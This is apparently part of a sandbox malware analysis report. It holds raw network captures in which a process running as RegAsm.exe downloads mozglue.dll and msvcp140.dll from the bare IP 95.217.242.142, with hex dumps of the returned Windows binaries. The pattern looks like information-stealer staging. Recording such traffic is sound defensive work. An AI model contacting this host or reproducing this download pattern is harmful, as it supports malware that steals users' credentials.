                                                                                                                                                                                                                                                            2024-04-29 20:13:18 UTC16384INData Raw: 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 00 c7 85 7c ff ff ff 00 00 00 00 c7 85 6c ff ff
                                                                                                                                                                                                                                                            Data Ascii: $`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE|l
                                                                                                                                                                                                                                                            2024-04-29 20:13:18 UTC16384INData Raw: 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff 89 f0 f7 65 f0 89 95 28 ff ff ff 89 85 30 ff ff
                                                                                                                                                                                                                                                            Data Ascii: eLXee0@eeeue0UEeeUeee $e(0
                                                                                                                                                                                                                                                            2024-04-29 20:13:18 UTC16384INData Raw: 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45 e8 ff 8d 1c 18 89 7d e4 83 d3 00 0f 92 45 8c
                                                                                                                                                                                                                                                            Data Ascii: MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE}E
                                                                                                                                                                                                                                                            2024-04-29 20:13:19 UTC16384INData Raw: ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5 28 ff ff ff 8b b5 04 ff ff ff 81 e6 ff ff
                                                                                                                                                                                                                                                            Data Ascii: 0<48%8A)$(


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            22192.168.2.44976695.217.242.1424437440C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-04-29 20:13:20 UTC221OUTGET /mozglue.dll HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                            Host: 95.217.242.142
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            2024-04-29 20:13:20 UTC246INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 29 Apr 2024 20:13:20 GMT
                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                            Content-Length: 608080
                                                                                                                                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            ETag: "6315a9f4-94750"
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            2024-04-29 20:13:20 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00
                                                                                                                                                                                                                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
                                                                                                                                                                                                                                                            2024-04-29 20:13:21 UTC16384INData Raw: ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 c7 46 4c 00 00 00 00 c7 46 50 0f 00 00 00 c6 46
                                                                                                                                                                                                                                                            Data Ascii: A$P~#HbA$P~#HUVuF|FlNhFdFhFTNPFLFPF
                                                                                                                                                                                                                                                            2024-04-29 20:13:21 UTC16384INData Raw: 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c ff ff ff 56 e8 de bc ff ff 89 f1 89 fa e8 d5 f1
                                                                                                                                                                                                                                                            Data Ascii: PzEPWxP1`PHP$,FM1R'^_[]00L9tc<V
                                                                                                                                                                                                                                                            2024-04-29 20:13:21 UTC16384INData Raw: 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 1f 85 eb 51 89 f0 f7 e1 89 d1 c1 e9 05 89 c8 ba
                                                                                                                                                                                                                                                            Data Ascii: )0LY)0LZ|!i(0C}L8!i(0u9Gu)0E8)0}LQ
                                                                                                                                                                                                                                                            2024-04-29 20:13:21 UTC16384INData Raw: 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 06 8b 45 ec 89 46 08 e9 8b fe ff ff 68 a7 fa 07
                                                                                                                                                                                                                                                            Data Ascii: 1B]zB|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSREEFh
                                                                                                                                                                                                                                                            2024-04-29 20:13:21 UTC16384INData Raw: 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8
                                                                                                                                                                                                                                                            Data Ascii: H) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) sUSWV
                                                                                                                                                                                                                                                            2024-04-29 20:13:21 UTC16384INData Raw: 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 83 f9 08 8b 7c 24 08 0f 83 b0 03 00 00 85 db 0f
                                                                                                                                                                                                                                                            Data Ascii: D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F|$4rD$ D$ WVjjPS,VL$4|$
                                                                                                                                                                                                                                                            2024-04-29 20:13:21 UTC16384INData Raw: 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c 24 89 7c 24 08 8b 4b 08 89 0c 24 89 53 04 0f a4
                                                                                                                                                                                                                                                            Data Ascii: D$4P<|$\$t@)GD$ P08z.Jt_@u`|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<$|$K$S
                                                                                                                                                                                                                                                            2024-04-29 20:13:21 UTC16384INData Raw: 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b 10 83 e2 fe 83 e1 01 09 d1 89 4e 04 89 30 8b 4b
                                                                                                                                                                                                                                                            Data Ascii: XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKNN0K
                                                                                                                                                                                                                                                            2024-04-29 20:13:21 UTC16384INData Raw: c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 85 c0 0f 84 c2 09 00 00 80 60 04 fe 8b 4c 24 0c
                                                                                                                                                                                                                                                            Data Ascii: rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H`L$


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            23192.168.2.44976795.217.242.1424437440C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-04-29 20:13:22 UTC222OUTGET /msvcp140.dll HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                            Host: 95.217.242.142
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            2024-04-29 20:13:23 UTC246INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 29 Apr 2024 20:13:22 GMT
                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                            Content-Length: 450024
                                                                                                                                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            ETag: "6315a9f4-6dde8"
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            2024-04-29 20:13:23 UTC16138INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
                                                                                                                                                                                                                                                            2024-04-29 20:13:23 UTC16384INData Raw: 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d 00 72 00 2d 00 69 00 6e 00 00 00 6d 00 73 00 2d
                                                                                                                                                                                                                                                            Data Ascii: hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr-inms-
                                                                                                                                                                                                                                                            2024-04-29 20:13:23 UTC16384INData Raw: 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 c8 8b 00 10 00
                                                                                                                                                                                                                                                            Data Ascii: {|L@DX}0}}M@4}0}}4M@tXM}0}}XM@
                                                                                                                                                                                                                                                            2024-04-29 20:13:23 UTC16384INData Raw: c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 fc dd e2 df e0 dd da f6 c4 44 7b 49 d9 c2 d8 c1
                                                                                                                                                                                                                                                            Data Ascii: E]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u|_E^UQQMuU]EDB]ED{nt]B]ED{I
                                                                                                                                                                                                                                                            2024-04-29 20:13:23 UTC16384INData Raw: f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b 83 c0 02 83 6d d4 01 75 ec 8b c2 85 c0 74 26 3b
                                                                                                                                                                                                                                                            Data Ascii: f;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90utmut&;
